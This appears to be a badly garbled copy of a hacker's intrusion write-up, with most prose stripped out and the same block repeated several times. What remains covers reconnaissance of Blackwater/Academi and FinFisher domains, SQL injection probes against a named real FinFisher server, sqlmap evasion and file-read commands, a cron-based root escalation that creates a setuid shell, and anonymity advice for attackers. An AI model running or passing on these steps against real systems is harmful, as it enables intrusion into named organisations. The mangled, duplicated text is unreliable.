whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
